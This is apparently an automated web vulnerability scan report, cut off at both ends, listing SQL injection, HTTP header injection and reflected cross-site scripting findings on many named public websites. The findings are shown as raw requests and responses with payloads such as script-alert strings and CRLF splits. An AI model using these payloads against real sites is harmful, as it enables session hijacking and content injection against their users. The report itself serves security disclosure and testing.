Severity:	High
Confidence:	Certain
Host:	http://www.x17online.com
Path:	/server-status

Issue detail

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.x17online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not found
Date: Sat, 02 Apr 2011 02:27:10 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1787

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/server-status'/index%'))
and bl' at line 5</font>
...[SNIP]...

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.x17online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not found
Date: Sat, 02 Apr 2011 02:27:10 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...

2. HTTP header injection previous next
There are 3 instances of this issue:

http://www.elitistjerks.com/server-status [REST URL parameter 1]
http://www.ew.com/server-status [REST URL parameter 1]
http://www.people.com/server-status [REST URL parameter 1]

2.1. http://www.elitistjerks.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.elitistjerks.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f5d71%0d%0a88453c48322 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f5d71%0d%0a88453c48322 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elitistjerks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Sat, 02 Apr 2011 02:14:47 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://elitistjerks.com/f5d71
88453c48322

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>

2.2. http://www.ew.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ew.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ef893%0d%0a9bc56d771c9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ef893%0d%0a9bc56d771c9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ew.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 02:51:41 GMT
Location: http://www.ew.com/ew/ef893
9bc56d771c9
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.ew.com/ew/ef
...[SNIP]...

2.3. http://www.people.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.people.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 78778%0d%0a53901b7acc7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /78778%0d%0a53901b7acc7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.people.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 02:35:46 GMT
Location: http://www.people.com/people/78778
53901b7acc7
Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.people.com/p
...[SNIP]...

3. Cross-site scripting (reflected) previous
There are 113 instances of this issue:

http://www.2dopeboyz.com/server-status [REST URL parameter 1]
http://www.2dopeboyz.com/server-status [name of an arbitrarily supplied request parameter]
http://www.4shared.com/server-status [REST URL parameter 1]
http://www.4shared.com/server-status [REST URL parameter 1]
http://www.abcteach.com/server-info [REST URL parameter 1]
http://www.abcteach.com/server-info [name of an arbitrarily supplied request parameter]
http://www.abcteach.com/server-status [REST URL parameter 1]
http://www.affordable-life-insurance-rates.org/server-status [REST URL parameter 1]
http://www.affordable-life-insurance-rates.org/server-status [REST URL parameter 1]
http://www.americanpregnancy.org/server-status [REST URL parameter 1]
http://www.answerbag.com/server-status [REST URL parameter 1]
http://www.bomb-mp3.com/server-status [REST URL parameter 1]
http://www.bomb-mp3.com/server-status [REST URL parameter 1]
http://www.bomb-mp3.com/server-status [name of an arbitrarily supplied request parameter]
http://www.bomb-mp3.com/server-status [name of an arbitrarily supplied request parameter]
http://www.bordersrewardsperks.com/server-info [REST URL parameter 1]
http://www.bordersrewardsperks.com/server-status [REST URL parameter 1]
http://www.businessworkforce.com/server-status [name of an arbitrarily supplied request parameter]
http://www.calorie-count.com/server-status [REST URL parameter 1]
http://www.calorie-count.com/server-status [name of an arbitrarily supplied request parameter]
http://www.circleofmoms.com/server-status [REST URL parameter 1]
http://www.circleofmoms.com/server-status [REST URL parameter 1]
http://www.circleofmoms.com/server-status [REST URL parameter 1]
http://www.cj.com/server-status [name of an arbitrarily supplied request parameter]
http://www.classesandcareers.com/server-status [REST URL parameter 1]
http://www.collegehumor.com/server-status [REST URL parameter 1]
http://www.collegehumor.com/server-status [REST URL parameter 1]
http://www.computerhope.com/server-status [REST URL parameter 1]
http://www.computerhope.com/server-status [name of an arbitrarily supplied request parameter]
http://www.csmonitor.com/server-status [REST URL parameter 1]
http://www.csmonitor.com/server-status [name of an arbitrarily supplied request parameter]
http://www.dailyjobposts.com/server-status [REST URL parameter 1]
http://www.diabetes.org/server-info [REST URL parameter 1]
http://www.diabetes.org/server-status [REST URL parameter 1]
http://www.dipity.com/server-status [REST URL parameter 1]
http://www.docstoc.com/server-status [REST URL parameter 1]
http://www.docstoc.com/server-status [name of an arbitrarily supplied request parameter]
http://www.dorkly.com/server-status [REST URL parameter 1]
http://www.education.com/server-status [REST URL parameter 1]
http://www.elyrics.net/server-status [REST URL parameter 1]
http://www.elyrics.net/server-status [name of an arbitrarily supplied request parameter]
http://www.foreignpolicy.com/server-status [REST URL parameter 1]
http://www.foreignpolicy.com/server-status [REST URL parameter 1]
http://www.gamespot.com/server-status [REST URL parameter 1]
http://www.gamestop.com/server-status [REST URL parameter 1]
http://www.gamestop.com/server-status [name of an arbitrarily supplied request parameter]
http://www.gather.com/server-status [REST URL parameter 1]
http://www.gather.com/server-status [REST URL parameter 1]
http://www.groupfusion.net/server-status [REST URL parameter 1]
http://www.hawaii.edu/server-status [REST URL parameter 1]
http://www.hawaii.edu/server-status [name of an arbitrarily supplied request parameter]
http://www.instructables.com/server-status [REST URL parameter 1]
http://www.jotform.com/server-status [REST URL parameter 1]
http://www.listal.com/server-status [REST URL parameter 1]
http://www.listal.com/server-status [name of an arbitrarily supplied request parameter]
http://www.magazines.com/server-status [REST URL parameter 1]
http://www.manta.com/server-status [REST URL parameter 1]
http://www.manta.com/server-status [REST URL parameter 1]
http://www.marthastewart.com/server-status [REST URL parameter 1]
http://www.medications.com/server-status [REST URL parameter 1]
http://www.nationalguard.com/server-status [REST URL parameter 1]
http://www.nyu.edu/server-info [name of an arbitrarily supplied request parameter]
http://www.nyu.edu/server-status [name of an arbitrarily supplied request parameter]
http://www.offers.com/server-status [REST URL parameter 1]
http://www.patch.com/server-status [REST URL parameter 1]
http://www.pcpitstop.com/server-status [name of an arbitrarily supplied request parameter]
http://www.picosearch.com/server-status [REST URL parameter 1]
http://www.prescriptiondrug-info.com/server-status [name of an arbitrarily supplied request parameter]
http://www.pronto.com/server-status [REST URL parameter 1]
http://www.rzaz.net/server-status [REST URL parameter 1]
http://www.rzaz.net/server-status [REST URL parameter 1]
http://www.rzaz.net/server-status [REST URL parameter 1]
http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter]
http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter]
http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter]
http://www.simplejobing.com/server-status [REST URL parameter 1]
http://www.smartertravel.com/server-status [REST URL parameter 1]
http://www.tech-archive.net/server-status [REST URL parameter 1]
http://www.tech-archive.net/server-status [REST URL parameter 1]
http://www.tech-archive.net/server-status [name of an arbitrarily supplied request parameter]
http://www.tech-archive.net/server-status [name of an arbitrarily supplied request parameter]
http://www.thenation.com/server-status [REST URL parameter 1]
http://www.thenation.com/server-status [name of an arbitrarily supplied request parameter]
http://www.theroot.com/server-status [REST URL parameter 1]
http://www.thestar.com/server-status [REST URL parameter 1]
http://www.thestar.com/server-status [name of an arbitrarily supplied request parameter]
http://www.toledoblade.com/server-info [REST URL parameter 1]
http://www.toledoblade.com/server-status [REST URL parameter 1]
http://www.traderonline.com/server-status [REST URL parameter 1]
http://www.umd.edu/server-status [REST URL parameter 1]
http://www.umd.edu/server-status [name of an arbitrarily supplied request parameter]
http://www.utk.edu/server-info [REST URL parameter 1]
http://www.utk.edu/server-status [REST URL parameter 1]
http://www.weei.com/server-status [REST URL parameter 1]
http://www.4shared.com/server-status [Referer HTTP header]
http://www.abcteach.com/server-info [Referer HTTP header]
http://www.bnet.com/server-status [Referer HTTP header]
http://www.careerbuilder.com/server-status [Referer HTTP header]
http://www.evite.com/server-status [Referer HTTP header]
http://www.fool.com/server-status [Referer HTTP header]
http://www.gamespot.com/server-status [Referer HTTP header]
http://www.hawaii.edu/server-status [Referer HTTP header]
http://www.phonenumber.com/server-info [Referer HTTP header]
http://www.pogo.com/server-status [Referer HTTP header]
http://www.shutterfly.com/server-status [Referer HTTP header]
http://www.surveygizmo.com/server-status [User-Agent HTTP header]
http://www.toysrus.com/server-status [Referer HTTP header]
http://www.arstechnica.com/server-info [REST URL parameter 1]
http://www.arstechnica.com/server-status [REST URL parameter 1]
http://www.azstarnet.com/server-status [REST URL parameter 1]
http://www.officialpayments.com/server-status [REST URL parameter 1]
http://www.officialpayments.com/server-status [name of an arbitrarily supplied request parameter]
http://www.tns-global.com/server-status [name of an arbitrarily supplied request parameter]

3.1. http://www.2dopeboyz.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.2dopeboyz.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b6e</script><script>alert(1)</script>6f4ec5e7979 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusd2b6e</script><script>alert(1)</script>6f4ec5e7979 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2dopeboyz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:49:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://www.2dopeboyz.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:49:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head prof
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:6685975,
c3:"",
c4:"www.2dopeboyz.com/server-statusd2b6e</script><script>alert(1)</script>6f4ec5e7979",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

3.2. http://www.2dopeboyz.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.2dopeboyz.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee082</script><script>alert(1)</script>c7340aa2e43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?ee082</script><script>alert(1)</script>c7340aa2e43=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2dopeboyz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:49:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://www.2dopeboyz.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:49:09 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head prof
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:6685975,
c3:"",
c4:"www.2dopeboyz.com/server-status?ee082</script><script>alert(1)</script>c7340aa2e43=1",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

3.3. http://www.4shared.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f015'-alert(1)-'ee443a28691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status2f015'-alert(1)-'ee443a28691 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /server-status2f015'-alert(1)-'ee443a28691
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 02:40:06 GMT
Content-Length: 41893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/server-status2f015'-alert(1)-'ee443a28691',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

3.4. http://www.4shared.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52eac"-alert(1)-"c7ae2db8b75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status52eac"-alert(1)-"c7ae2db8b75 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /server-status52eac"-alert(1)-"c7ae2db8b75
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 02:40:04 GMT
Content-Length: 41893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/server-status52eac"-alert(1)-"c7ae2db8b75";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.5. http://www.abcteach.com/server-info [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abcteach.com
Path:	/server-info

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 15610><script>alert(1)</script>c9fa08d7d35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-info15610><script>alert(1)</script>c9fa08d7d35 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.abcteach.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:58:11 GMT
Server: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.7e-p1 DAV/2 PHP/4.4.7 with Suhosin-Patch
X-Powered-By: PHP/4.4.7
Vary: Accept-Encoding
Content-Length: 562
Content-Type: text/html

<html>
<head>
<title>Missing Page</title>
</head>

<body>
<H1>Missing Page</H1>

You have requested a page that has moved or is missing.
<br><br>
<form method="post" action="/globals/record_bad_url.ph
...[SNIP]...
<input type=hidden value=/server-info15610><script>alert(1)</script>c9fa08d7d35 name=request>
...[SNIP]...

3.6. http://www.abcteach.com/server-info [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abcteach.com
Path:	/server-info

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b06c8><script>alert(1)</script>c84e0f6ed17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-info?b06c8><script>alert(1)</script>c84e0f6ed17=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.abcteach.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:58:03 GMT
Server: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.7e-p1 DAV/2 PHP/4.4.7 with Suhosin-Patch
X-Powered-By: PHP/4.4.7
Vary: Accept-Encoding
Content-Length: 565
Content-Type: text/html

<html>
<head>
<title>Missing Page</title>
</head>

<body>
<H1>Missing Page</H1>

You have requested a page that has moved or is missing.
<br><br>
<form method="post" action="/globals/record_bad_url.ph
...[SNIP]...
<input type=hidden value=/server-info?b06c8><script>alert(1)</script>c84e0f6ed17=1 name=request>
...[SNIP]...

3.7. http://www.abcteach.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abcteach.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 59d76><script>alert(1)</script>51688ab36bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status59d76><script>alert(1)</script>51688ab36bf HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.abcteach.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:34:50 GMT
Server: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.7e-p1 DAV/2 PHP/4.4.7 with Suhosin-Patch
X-Powered-By: PHP/4.4.7
Vary: Accept-Encoding
Content-Length: 564
Content-Type: text/html

<html>
<head>
<title>Missing Page</title>
</head>

<body>
<H1>Missing Page</H1>

You have requested a page that has moved or is missing.
<br><br>
<form method="post" action="/globals/record_bad_url.ph
...[SNIP]...
<input type=hidden value=/server-status59d76><script>alert(1)</script>51688ab36bf name=request>
...[SNIP]...

3.8. http://www.affordable-life-insurance-rates.org/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.affordable-life-insurance-rates.org
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7125'-alert(1)-'6fea77851a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusa7125'-alert(1)-'6fea77851a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.affordable-life-insurance-rates.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:40:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-2
Set-Cookie: PHPSESSID=047a304c19f16c1f7d49b4a5ea6f8dcd; path=/; domain=.affordable-life-insurance-rates.org
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

<title>A
...[SNIP]...
<![CDATA[ */
   try {
       var pageTracker = _gat._getTracker("UA-10764129-34");
       pageTracker._setDomainName('.affordable-life-insurance-rates.org');
       pageTracker._trackPageview('/server-statusa7125'-alert(1)-'6fea77851a');
   }
   catch(err) {}
/* ]]>
...[SNIP]...

3.9. http://www.affordable-life-insurance-rates.org/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.affordable-life-insurance-rates.org
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc2b"><script>alert(1)</script>f408c2fb170 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status5fc2b"><script>alert(1)</script>f408c2fb170 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.affordable-life-insurance-rates.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:40:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-2
Set-Cookie: PHPSESSID=ad75cc07a80d2c5f2df2769f7e13cc96; path=/; domain=.affordable-life-insurance-rates.org
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

<title>A
...[SNIP]...
<link rel="canonical" href="http://www.affordable-life-insurance-rates.org/server-status5fc2b"><script>alert(1)</script>f408c2fb170" />
...[SNIP]...

3.10. http://www.americanpregnancy.org/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.americanpregnancy.org
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a576c"><script>alert(1)</script>cda727bada6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusa576c"><script>alert(1)</script>cda727bada6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americanpregnancy.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:01:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2522
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input name="referrer" id="referrer" type="text" value="http://www.americanpregnancy.org/server-statusa576c"><script>alert(1)</script>cda727bada6" />
...[SNIP]...

3.11. http://www.answerbag.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.answerbag.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 98799'><script>alert(1)</script>c6791048b4f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status98799'><script>alert(1)</script>c6791048b4f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.answerbag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:39:53 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=8a2c312ec0af2f338559abb0b979246c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org
...[SNIP]...
<meta property='og:url' content='http://www.answerbag.com/server-status98799'><script>alert(1)</script>c6791048b4f' />
...[SNIP]...

3.12. http://www.bomb-mp3.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bomb-mp3.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94237<script>alert(1)</script>3271aa0ef4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status94237<script>alert(1)</script>3271aa0ef4c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bomb-mp3.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 21:23:23 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.12
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Content-Length: 726
Content-Type: text/html

<html>
   <head>
       <title>/server-status94237<script>alert(1)</script>3271aa0ef4c not found on www.bomb-mp3.com</title>
       <meta name="robots" content="noindex">
   </head>
   <body style="font-family:Lucida
...[SNIP]...
<h1>/server-status94237<script>alert(1)</script>3271aa0ef4c not found on bomb-mp3.com</h1>
...[SNIP]...

3.13. http://www.bomb-mp3.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bomb-mp3.com
Path:	/server-status

Issue detail

